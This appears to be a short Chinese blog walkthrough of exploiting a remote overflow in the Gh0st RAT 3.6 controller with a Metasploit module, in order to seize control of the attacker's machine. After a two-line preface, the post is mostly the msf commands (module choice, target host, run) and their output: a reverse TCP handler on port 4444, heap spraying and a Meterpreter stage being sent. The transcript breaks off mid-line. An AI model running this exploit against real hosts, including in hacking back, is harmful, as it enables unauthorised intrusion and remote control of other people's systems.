title: 利用Gh0st 3.6远程溢出漏洞反向控制攻击者
comments: true
toc: true
categories:
- [Metasploit]
- [Exp]
tags: - Metasploit
- Overflow
- Gh0st
date: 2020-01-12 18:30:10
abbrlink: 30568
前言
漏洞验证在2017年被公开,实际上Gh0st溢出漏洞在2009年时就已被人爆出过多个
可见使用开源C2工具,不见得安全,最好是经过二次修改,单纯做免杀可防不了哦
MSF
Teston WinXP at 2017-09-15
运行Gh0st客户端,然后通过MSF溢出C2客户端机器,即可反向获取攻击者机器权限
msf > use exploit/windows/misc/gh0st
msf exploit(gh0st) > set RHOST 192.168.1.126
RHOST => 192.168.1.126
msf exploit(gh0st) > run
[*] Started reverse TCP handler on 192.168.1.125:4444
[*] 192.168.1.126:80 - Trying target Gh0st Beta 3.6
[*] 192.168.1.126:80 - Spraying heap...
[*] 192.168.1.126:80 - Trying command 103...
[*] Sending stage (957999 bytes) to 192.168.1.126
[*] Meterpreter s